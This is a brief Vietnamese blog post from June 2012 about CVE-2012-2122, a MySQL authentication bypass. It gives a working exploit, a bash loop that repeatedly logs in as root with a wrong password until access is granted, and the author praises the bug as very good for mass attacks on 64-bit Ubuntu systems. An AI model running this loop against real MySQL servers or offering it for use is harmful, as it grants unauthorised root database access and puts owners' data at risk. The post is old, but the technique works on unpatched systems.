CVE-2012-2122
Exploit:
Cứ thử đăng nhập nhiều lần, thế nào cũng có lần được. Không quan tâm tới pass là gì!!
Hoặc:
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
Lỗi chuối củ này hiện tại được xác nhận trên Ubuntu 64 bit, tất cả các version.
Lỗi này ít ý nghĩa với targeted attack, nhưng với massive attack thì lại ngon vô cùng.
Thứ Hai, 18 tháng 6, 2012
0
Đăng ký:
Nhận xét (Atom)